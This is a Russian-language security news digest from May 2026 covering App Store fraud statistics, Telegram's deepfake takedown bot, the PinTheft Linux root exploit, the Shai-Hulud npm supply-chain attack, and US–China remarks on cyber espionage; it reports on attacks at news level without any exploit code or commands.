Подарочный значок на дипломатической встрече может выглядеть как обычный сувенир, но встроенный микрочип сразу превращает подарок в вопрос безопасности. Пресс-секретарь президента России Дмитрий Песков заявил, что к электронным подаркам иностранных делегаций нужно относиться осторожно, потому что получатель не всегда знает, какие функции выполняет встроенная электроника.
В интервью Павлу Зарубину для ИС «Вести» Песков прокомментировал решение американской делегации избавиться от сувениров, полученных в Китае. Представитель Кремля сказал, что у каждой страны действуют собственные нормы безопасности, а службы охраны вправе принимать меры, которые считают целесообразными.
«Китайский электронный значок, так же как значок электронный любой другой страны, содержит микрочип. Что он там делает, мы же не знаем, поэтому мы тоже должны быть осторожными», — сказал Песков.
Банкоматы готовят к режиму без мобильного интернета
25 мая. / Кибер Медиа /. Банкоматы и платежные терминалы в России смогут работать даже при отключениях мобильного интернета. Об этом заявила глава Центробанка Эльвира Набиуллина на VIII Съезде Ассоциации банков. По ее словам, Минцифры вместе с операторами связи уже проработали технические решения, которые позволят сохранить работу таких устройств в условиях ограничений.
Сейчас эту опцию тестируют. Также Банк России обсуждает с Минцифры включение всех банков в белые списки, чтобы их сервисы оставались доступными при ограничении мобильного интернета. Речь идет не только о комфорте пользователей, но и о непрерывности базовой платежной инфраструктуры.
Тема стала актуальной на фоне региональных отключений мобильного интернета. Такие ограничения вводят из-за угроз атак беспилотников, чтобы снизить риск управления ими через сотовые сети. Но вместе с этим страдают повседневные сервисы: оплата картой, доступ к приложениям, работа терминалов и банкоматов.
Для банковского сектора это означает необходимость резервных сценариев. Если терминалы и банкоматы смогут сохранять работоспособность без обычного мобильного подключения, часть платежных операций не будет зависеть от кратковременных сетевых ограничений. При этом пока неизвестно, когда решение выйдет из тестового режима и как именно оно будет работать у разных банков и операторов.
Хакеры остались без премии. За год пользователи Apple сохранили два миллиарда долларов благодаря бдительности алгоритмов
23 мая. / securitylab.ru /. Apple заявила, что в 2025 году предотвратила мошеннические операции в App Store на сумму более $2,2 млрд. Компания связывает такой результат с ручными проверками и системами машинного обучения, которые отслеживают подозрительные аккаунты, приложения и платежи ещё до того, как вредоносная активность затронет пользователей.
За год Apple отклонила более 2 млн заявок на публикацию приложений и обновлений, включая свыше 1,2 млн новых программ. Ещё почти 800 тыс. обновлений не прошли проверку из-за нарушений правил App Store. Отдельно компания удалила около 59 тыс. приложений, которые после одобрения меняли поведение и пытались использовать обманные схемы, включая финансовое мошенничество.
Серьёзная часть работы пришлась на борьбу с фальшивыми аккаунтами. Apple заблокировала 1,1 млрд попыток создать мошеннические учётные записи пользователей и отключила ещё 40,4 млн аккаунтов за злоупотребления. Компания также закрыла 193 тыс. аккаунтов разработчиков и отклонила более 138 тыс. заявок на регистрацию в программе для разработчиков.
Apple также сообщила о борьбе с нелегальными каналами распространения приложений. В 2025 году компания выявила и заблокировала 28 тыс. незаконных приложений в пиратских магазинах, включая вредоносные программы, азартные сервисы и копии легитимных приложений. За последний месяц Apple также пресекла 2,9 млн попыток установить или запустить приложения, распространявшиеся вне App Store или одобренных альтернативных площадок.
Отдельно компания контролировала отзывы, оценки и продвижение приложений. В 2025 году Apple обработала более 1,3 млрд оценок и отзывов, заблокировав почти 195 млн мошеннических публикаций.
Почти 7,8 тыс. приложений исключили из поиска App Store, ещё 11,5 тыс. не попали в чарты из-за попыток обмануть систему ранжирования.
В сфере платежей Apple пресекла использование более 5,4 млн украденных банковских карт и закрыла для почти 2 млн аккаунтов возможность проводить новые транзакции. По данным компании, за шесть лет App Store предотвратил потенциально мошеннические операции на сумму более $11,2 млрд.
Telegram открыл жалобы на интимные дипфейки, но пока только для США
21 мая. / КИБЕР МЕДИА /. Telegram запустил специального бота для жалоб на интимные изображения и видео, опубликованные без согласия человека. Инструмент доступен пользователям из США и связан с исполнением закона TAKE IT DOWN Act, который распространяется в том числе на сгенерированные ИИ интимные дипфейки.
Через бота можно пожаловаться на нежелательное интимное изображение или ролик, если материал касается самого пользователя или его личности. Telegram должен рассмотреть такую жалобу и удалить соответствующий контент в течение 48 часов.
TAKE IT DOWN Act был подписан в США 19 мая 2025 года, а требования к платформам по процедуре удаления начали действовать 19 мая 2026 года. Закон обязывает covered platforms предоставить понятный механизм жалоб и удалять валидно заявленные интимные изображения без согласия, включая реальные материалы и AI-generated deepfakes, а также известные идентичные копии в течение 48 часов.
Пока Telegram не анонсировал аналогичный механизм для пользователей из других стран. Это важное ограничение: если жертва находится не в США, отдельного удобного сценария через TIDABot для нее сейчас не предусмотрено.
Для платформ это еще один сигнал, что борьба с интимными дипфейками переходит из зоны добровольной модерации в юридически обязательную процедуру. Теперь речь идет не только о правилах сообщества, а о сроках удаления, форме жалобы и ответственности за бездействие.
📚Root без пароля и ядро Linux под контролем. Разбираем, как работает эксплойт PinTheft
21 мая. / securitylab.ru /. В сети опубликовали готовый код, позволяющий эксплуатировать опасную уязвимость в ядре Arch Linux, которая позволяет локальному злоумышленнику получить права root и полностью захватить систему. Уязвимость получила название PinTheft. Проблему обнаружила команда V12 в подсистеме RDS, отвечающей за Reliable Datagram Sockets. Разработчики ядра уже выпустили исправление, однако идентификатор CVE для ошибки пока не присвоили.
Специалисты рассказали, что проблема связана с ошибкой двойного освобождения памяти в механизме zerocopy. При определённых условиях злоумышленник может повредить структуру памяти ядра и выполнить код с максимальными привилегиями. Опубликованный PoC-эксплойт постепенно перехватывает ссылки на страницы памяти через io_uring, после чего получает root-доступ.
Для успешной атаки требуется сразу несколько условий. На целевой системе должен быть загружен модуль RDS, включён интерфейс ввода-вывода io_uring, присутствовать SUID-бинарник с правами root, а сама система должна работать на архитектуре x86_64. По данным V12, среди популярных дистрибутивов модуль RDS по умолчанию активирован только в Arch Linux, поэтому основная угроза wdormann/116602497250448701?utm_source=Securitylab.ru">касается именно пользователей этой системы.
Тем, кто ещё не установил свежие обновления ядра, рекомендуют сделать это как можно быстрее. В качестве временной меры можно отключить модули RDS и запретить им автоматически загружаться через modprobe.
PinTheft продолжает серию опасных уязвимостей, позволяющих повышать привилегии в Linux, о которых стало известно за последние недели. Недавно специалисты также опубликовали PoC-код, чтобы эксплуатировать DirtyDecrypt и DirtyCBC. Проблемы относятся к тому же классу уязвимостей, что Dirty Frag, Fragnesia и Copy Fail.
📚639 вредоносных версий за 60 минут. Вот как глубоко зашла новая атака на npm
20 мая. / securitylab.ru /. В экосистеме npm снова вспыхнула крупная атака на цепочку поставок: злоумышленники за один час протолкнули сотни вредоносных версий популярных пакетов, которыми пользуются разработчики и системы сборки. Кампания связана с Shai-Hulud и особенно опасна тем, что заражённые библиотеки могли выглядеть почти как обычные обновления.
По данным Socket, 19 мая с 04:56 до 05:56 по московскому времени атакующие опубликовали 639 вредоносных версий в 323 уникальных пакетах. Больше всего пострадала экосистема @antv, где выходят библиотеки для графиков, визуализации данных, блок-схем и карт. Среди затронутых пакетов упоминаются @antv/g2, @antv/g6, @antv/x6, @antv/l7, echarts-for-react, timeago.js, size-sensor и canvas-nest.js.
Атака началась со взлома npm-аккаунта atool, через который публиковались пакеты @antv. Вредоносный код встраивался в файл index.js и пытался украсть токены GitHub и npm, облачные ключи, данные Kubernetes, Vault, Docker, SSH, базы данных и секреты из CI/CD-сред. Под удар попали рабочие станции разработчиков и платформы сборки, включая GitHub Actions, GitLab CI, Jenkins, Azure DevOps, CircleCI, Vercel и Netlify.
Украденные данные шифровались и отправлялись через Session P2P, что усложняло обнаружение сетевой активности. Когда вредоносный код находил доступ к GitHub, он создавал репозитории в аккаунтах жертв и загружал туда похищенные сведения. Aikido Security насчитала более 2700 таких репозиториев, а перед публикацией исходного материала их количество уже превышало 2900.
Разработчикам, которые устанавливали затронутые пакеты, рекомендуют удалить заражённые версии или откатиться на безопасные релизы до 18 мая, а затем сменить все потенциально раскрытые ключи, токены и SSH-доступы.
📚Взаимный взлом со скидкой на дипломатию. Почему Трамп и Си Цзиньпин вдруг заговорили о наболевшем
19 мая. / securitylab.ru /. Недавний разговор Дональда Трампа и Си Цзиньпина в Пекине вышел за рамки обычной дипломатии. Лидеры США и Китая затронули тему, о которой публично говорят редко — взаимные кибератаки, слежку и работу спецслужб в чужих сетях.
Дональд Трамп рассказал журналистам на борту президентского самолёта, что поднял вопрос киберопераций на встрече с председателем КНР. По словам президента США, Си Цзиньпин, в свою очередь, говорил о действиях Вашингтона против Китая. Трамп фактически признал, что обе стороны ведут активную разведку друг против друга и используют скрытые возможности в цифровой среде.
Конкретные операции американский президент не назвал. При этом последние годы власти США регулярно связывают Китай с масштабными проникновениями в телекоммуникационные сети, госструктуры и объекты инфраструктуры. Одной из самых заметных кампаний стала активность группы Volt Typhoon, которую американские ведомства считают связанной с Китаем. По оценке Вашингтона, участники группы закреплялись в системах энергетики, водоснабжения и других критически важных объектов, чтобы при необходимости нарушить их работу, в том числе на фоне возможного кризиса вокруг Тайваня.
Когда Трампа спросили о подобных проникновениях, президент ответил с осторожностью и заявил, что хотел бы увидеть доказательства, хотя не исключил такую возможность. Такой тон заметно отличается от привычных публичных обвинений в адрес Пекина и показывает, насколько чувствительной остаётся тема киберопераций.
Заявления Трампа стали редким признанием того, что США сами активно следят за китайскими сетями и чиновниками. Подобные задачи выполняют, в частности, NSA и CIA, используя закрытые инструменты, партнёрства и агентурные каналы. Ранее CIA уже пыталась публично привлекать к сотрудничеству сотрудников китайских структур через специальные видеокампании.
Тем временем, китайские власти обычно отвергают обвинения в хакерских атаках и шпионаже. Белый дом и посольство КНР в Вашингтоне не дали оперативных комментариев по поводу слов Трампа.